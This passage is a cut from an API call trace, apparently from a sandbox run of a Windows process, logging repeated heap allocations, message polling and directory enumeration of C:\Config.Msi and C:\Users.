dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.394] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.394] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.395] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.396] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.399] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.401] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.402] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.402] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.402] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.403] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.403] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.403] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.403] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.403] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.403] PathFindFileNameW (pszPath="") returned="" [0227.403] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.404] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.404] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.405] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.405] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.405] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.405] FindNextFileW 